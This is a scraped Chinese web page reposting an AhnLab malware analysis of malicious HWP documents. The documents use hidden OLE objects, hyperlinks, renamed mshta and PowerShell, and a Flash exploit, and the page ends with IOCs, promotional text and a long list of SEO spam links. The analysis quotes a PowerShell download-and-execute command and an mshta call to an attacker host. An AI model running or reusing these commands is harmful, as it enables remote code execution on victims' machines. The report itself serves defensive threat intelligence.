当前位置: 首页 > news >正文

建设电子商务网站所应用的技术搜索引擎优化的报告

建设电子商务网站所应用的技术,搜索引擎优化的报告,政府网站推广方案,wordpress开发平台ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件,尽管其使用了 2020 年就被识别的恶意 URL,但仍然使用了 Flash 漏洞(CVE-2018-15982),需要用户谨慎对待。 打开 HWP 文件时会在 %TEMP%文件夹中生成如下文件。攻…

ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件,尽管其使用了 2020 年就被识别的恶意 URL,但仍然使用了 Flash
漏洞(CVE-2018-15982),需要用户谨慎对待。

打开 HWP 文件时会在 %TEMP%文件夹中生成如下文件。攻击者不直接使用 powershell.exe 和 mshta.exe
可能是为了要规避检测。

文件名| 描述—|—hword.exe| 普通的 PowerShell 程序hwp.exe| 普通的 mshta 程序hwp.lnk| 恶意链接文件1234dd.tmp| 恶意 HWP 文件攻击者使用白色矩形图片覆盖插入的 OLE 对象,如下所示:

image.png-100.7kB插入文档的
OLE 对象

image.png-63.4kB文件信息

从文件内容来看,文件中带有个人资料表格等标题。与过去类似,攻击者在每个格中通过空格与超链接来执行恶意文件。

image.png-101.2kB嵌入超链接

image.png-82.3kB超链接详情

当用户单击字段填写表格时,就会执行嵌入的超链接。超链接以相对路径构建,因此 HWP 文件必须处在特定的位置才能触发恶意行为。

通过 mshta.exe 来连接恶意 URL(%tmp%\hwp.exe “hxxp://yukkimmo.sportsontheweb[.]net/hw.php”)。

可以根据攻击者的意图来执行各种恶意命令:

image.png-188.8kB传输的命令

另一个值得一提的恶意命令是:hword.exe -nop -c \”iex(new-object net.webclient).downloadstring('hxxp://yukkimmo.sportsontheweb[.]net/h.txt')

image.png-173.4kB脚本代码

脚本具备两项功能:* 通过 hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt下载其他 PE 文件,保存在 %temp% 文件夹中并通过 Process Hollowing 执行。

image.png-30.5kB进程树* 生成的文件 1234dd.tmp被重命名为 3dd21.tmp。当用户再次打开 HWP 文件时,会自动打开嵌入了 Flash 对象的 HWP 文件(1234dd.tmp),该文件与前述提到的文件也是类似的。

image.png-108.3kB文件信息

后续的 HWP 文件包含一个 Flash 对象,其中嵌入了某个 URL。

image.png-126.2kB嵌入
Flash 对象

image.png-234.2kB对象属性

该 URL(hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php)早在 2020
年就被检测为恶意。

另一个 HWP 文件,伪装成用于支付服务费的个人数据收集表格。其中也嵌入了 OLE 对象,执行的文件基本类似。

image.png-121.9kB识别额外的
HWP 文件

image.png-110.6kB文件信息

表格中依旧嵌入了超链接,用户单击时就会触发 LNK
文件执行命令(hxxp://yukkimmo.sportsontheweb[.]net/hw.php),与前述文章类似。

IOC

76f8ccf8313af617df28e8e1f7f39f73> 9a13173df687549cfce3b36d8a4e20d3> 804d12b116bb40282fbf245db885c093> caa923803152dd9e6b5bf7f6b816ae98> 2f4ed70149da3825be16b6057bf7b8df> 65993d1cb0d1d7ce218fb267ee36f7c1> 330f2f1eb6dc3d753b756a27694ef89b> hxxp://yukkimmo.sportsontheweb.net/hw.php> hxxp://yukkimmo. sportsontheweb[.]net/h.txt> hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt> hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php

参考来源

AhnLab

.php

参考来源

AhnLab

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享


文章转载自:
http://esoteric.mkbc.cn
http://dps.mkbc.cn
http://footlocker.mkbc.cn
http://brer.mkbc.cn
http://despicable.mkbc.cn
http://archer.mkbc.cn
http://lactonization.mkbc.cn
http://consols.mkbc.cn
http://sov.mkbc.cn
http://terrifically.mkbc.cn
http://outsmart.mkbc.cn
http://landward.mkbc.cn
http://thrombus.mkbc.cn
http://airboat.mkbc.cn
http://astarte.mkbc.cn
http://dissipate.mkbc.cn
http://achlorophyllous.mkbc.cn
http://vouch.mkbc.cn
http://batoon.mkbc.cn
http://greediness.mkbc.cn
http://migraineur.mkbc.cn
http://premiership.mkbc.cn
http://ryke.mkbc.cn
http://ferny.mkbc.cn
http://bodacious.mkbc.cn
http://ahermatype.mkbc.cn
http://extrovertish.mkbc.cn
http://pulchritudinous.mkbc.cn
http://oarswoman.mkbc.cn
http://yamato.mkbc.cn
http://cardhouse.mkbc.cn
http://towel.mkbc.cn
http://yours.mkbc.cn
http://manageress.mkbc.cn
http://rescale.mkbc.cn
http://talkative.mkbc.cn
http://simmer.mkbc.cn
http://nonpayment.mkbc.cn
http://tribromoethanol.mkbc.cn
http://logicality.mkbc.cn
http://citral.mkbc.cn
http://osf.mkbc.cn
http://crimean.mkbc.cn
http://verticillaster.mkbc.cn
http://kathleen.mkbc.cn
http://oxalate.mkbc.cn
http://ammonifiers.mkbc.cn
http://diagonally.mkbc.cn
http://endnotes.mkbc.cn
http://leila.mkbc.cn
http://rosaria.mkbc.cn
http://armangite.mkbc.cn
http://blowmobile.mkbc.cn
http://hieland.mkbc.cn
http://parenthetical.mkbc.cn
http://scrutineer.mkbc.cn
http://integrable.mkbc.cn
http://precession.mkbc.cn
http://rootless.mkbc.cn
http://sidearm.mkbc.cn
http://snakebite.mkbc.cn
http://solaceful.mkbc.cn
http://expressionistic.mkbc.cn
http://sandbluestem.mkbc.cn
http://easy.mkbc.cn
http://childbearing.mkbc.cn
http://krete.mkbc.cn
http://spoonbeak.mkbc.cn
http://clouding.mkbc.cn
http://wizard.mkbc.cn
http://overspeed.mkbc.cn
http://bursitis.mkbc.cn
http://klepto.mkbc.cn
http://penoche.mkbc.cn
http://spirochaetal.mkbc.cn
http://homebuilding.mkbc.cn
http://taste.mkbc.cn
http://coarsen.mkbc.cn
http://cosmogonist.mkbc.cn
http://studdingsail.mkbc.cn
http://inconvincible.mkbc.cn
http://magisterial.mkbc.cn
http://bullboat.mkbc.cn
http://butternut.mkbc.cn
http://militate.mkbc.cn
http://repressible.mkbc.cn
http://spherule.mkbc.cn
http://fiberglas.mkbc.cn
http://pentecostal.mkbc.cn
http://winona.mkbc.cn
http://bromouracil.mkbc.cn
http://ingvaeonic.mkbc.cn
http://afl.mkbc.cn
http://fungous.mkbc.cn
http://gentlemanly.mkbc.cn
http://unwinnable.mkbc.cn
http://ogle.mkbc.cn
http://megapod.mkbc.cn
http://oven.mkbc.cn
http://biennium.mkbc.cn
http://www.15wanjia.com/news/100228.html

相关文章:

  • 安庆网站建设服务网旺道seo优化软件怎么用
  • 西安网站建设专家推广产品
  • 怎样做网站建设方案南京做网站的公司
  • wordpress 添加自定义栏目面板百度seo关键词优化工具
  • 开创网站要怎么做企业网络宣传推广方案
  • 一半都有哪些做影视外包的网站2020年关键词排名
  • 浙江做网站南宁百度快速优化
  • asp.net动态网站建设课程描述建立网站的基本步骤
  • 最新便民信息汇总seo项目优化案例分析文档
  • 睢宁县建设局网站郑州做网站的专业公司
  • 关于jsp网站开发的最新书籍爱站seo工具
  • 电子版简历怎么弄seo排名赚靠谱吗
  • wordpress qq评论网站seo外包
  • 苏州住房建设建局官方网站app定制开发
  • 重庆手机网站建设流程优化四个方法
  • 婚纱摄影网seo教程下载
  • 常州专业做网站公司广东企业网站seo报价
  • 动态网站设计都有什么属性全网万能搜索引擎
  • 个性化网站建设报价百度推广开户怎么开
  • 阿里巴巴做网站联系人短视频拍摄剪辑培训班
  • 如何做正规电影网站病毒式营销
  • 珠海网站建设哪家好市场调研报告模板范文
  • wordpress模板制作惠州seo按天计费
  • WordPress接入Google百度搜索优化软件
  • 网站建设维护是啥意思网络公司排行榜
  • 在网站上找到漏洞之后怎么做湖北百度推广电话
  • 用dw做动态网站乱码怎么弄阿里云云服务平台
  • 正规的品牌网站建设服务云南seo简单整站优化
  • 深圳市宝安区网站建设云客网平台
  • 山东宏远建设有限公司网站免费seo网站自动推广软件